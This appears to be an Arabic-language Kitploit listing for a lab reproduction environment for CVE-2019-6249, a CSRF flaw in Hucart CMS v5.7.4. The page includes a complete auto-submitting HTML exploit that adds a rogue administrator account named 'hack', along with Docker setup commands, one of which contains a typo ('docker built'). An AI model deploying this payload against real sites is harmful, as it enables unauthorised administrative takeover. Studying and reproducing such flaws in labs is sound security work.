Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-6249_Hucart-cms — CVE-2019-6249 Hucart cms بيئة إعادة الإنتاج | Kitploit
أدوات/GitHubGitHub/alphabugx/cve-2019-6249_hucart-cms
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubalphabugx/cve-2019-6249_hucart-cms

CVE-2019-6249_Hucart-cms

CVE-2019-6249 Hucart cms بيئة إعادة الإنتاج

عرض المستودع
12منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-6249_Hucart cms

ملخص الثغرة

اسم الثغرة: ثغرة CSRF في Hucart cms v5.7.4 تسمح بإضافة حساب مدير بشكل تعسفي
تاريخ الإبلاغ: 2019-01-13
مكتشف الثغرة: AllenChen ([email protected])
الصفحة الرئيسية للمنتج: http://www.hucart.com/
رابط البرنامج: http://www.hucart.com/
الإصدار: v5.7.4
رقم CVE: CVE-2019-6249\

نظرة عامة على الثغرة

يوجد ثغرة CSRF في الإصدار v5.7.4 من Hucart cms، حيث يمكن للمدير بعد تسجيل الدخول زيارة صفحة اختبار CSRF التالية لإضافة حساب مدير باسم hack.

كود الاستغلال

كود الاستغلال كما يلي: يضيف حساب مدير باسم hack وكلمة مرور hack123.

root@kitploit:~
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='adm_user' value='hack' />";
fields += "<input type='hidden' name='adm_email' value='[email protected]' />";  
fields += "<input type='hidden' name='adm_mobile' value='13888888888' />";  
fields += "<input type='hidden' name='adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='adm_enabled' value='1' />";  
fields += "<input type='hidden' name='act_type' value='add' />";  
fields += "<input type='hidden' name='adm_id' value='' />";  

var url = "http://localhost/hucart_cn/adminsys/index.php?load=admins&act=edit_info&act_type=add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

معلومات مرجعية

  • موقع طلب CVE الصيني: http://www.iwantacve.cn/index.php/archives/109/
  • موقع CVE الرسمي: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6249
  • exploit-db: https://www.exploit-db.com/exploits/46149

إعادة إنشاء البيئة (Docker)

في بيئة Docker، قم بتشغيل الأوامر التالية

root@kitploit:~
docker built -t hucart -f Dockerfile .
docker run -d -p 80:80 hucart

البريد الإلكتروني الأصلي: [email protected]

تنزيل الأداة